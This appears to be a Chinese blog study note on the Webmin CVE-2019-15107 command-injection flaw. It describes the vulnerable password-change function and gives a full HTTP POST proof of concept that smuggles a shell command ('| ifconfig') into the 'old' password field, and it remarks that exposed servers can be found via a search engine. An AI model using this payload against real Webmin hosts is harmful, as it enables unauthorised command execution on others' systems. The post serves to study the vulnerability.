WEBMIN(CVE-2019-15107) 学习
2024-09-07 09:58:21
简单介绍:
Webmin是目前功能最强大的基于Web的Unix系统管理工具。管理员通过浏览器访问Webmin的各种管理功能并完成相应的管理动作。目前Webmin支持绝大多数的Unix系统,这些系统除了各种版本的linux以外还包括:AIX、HPUX、Solaris、Unixware、Irix和FreeBSD等。Webmin 能够在远程使用支持 HTTPS协议的 Web 浏览器通过 Web 界面管理主机。
漏洞原理:在重置密码功能password_changge.cgi中发现了一个错误,该错误允许恶意第三方由于缺少输入验证而执行恶意代码
影响版本:一直到最新的1.920版本,存在于更换用户密码这个功能中。
poc:
POST /password_changge.cgi HTTP/1.1
Host: ip:
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:68.0) Gecko/ Firefox/68.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 69
Connection: close
Upgrade-Insecure-Requests: 1 user=root&pam=&expire=2&old=AkkuS | ifconfig&new1=akkuss&new2=akuss
- 但是,利用的前提是 已知root或其他账户的旧密码,在钟馗之眼查询webmin可以看到很多在线服务器。
最新文章
- ACM:UESTC - 649 括号配对问题 - stack
- Android百度地图附加搜索和公交路线方案搜索
- ifconfig
- 2013年第四届蓝桥杯C/C++程序设计本科B组决赛
- css 强制换行
- 【J2EE】struts-2.3.16.3+apache-tomcat-8.0.9开发环境部署,“Hello World”的实现。
- SPOJ 1487 Query on a tree III(划分树)
- PyCharm常用设置
- MongoDB 启动异常
- Unity UGUI——开源
- SPOJ - BITDIFF: Bit Difference [神妙の预处理]
- Zab: A simple totally ordered broadcast protocol(译)
- Vue.js安装
- js定义数组的方法
- Jetson TX1 install Opencv3
- Linux时间戳转换成BCD码(转载)
- FineUI开源版(ASP.Net)初学手册-部分JS整理
- [JOISC2014]スタンプラリー
- prop和attr的比较
- ORACLE之PACKAGE-包、存储过程、函数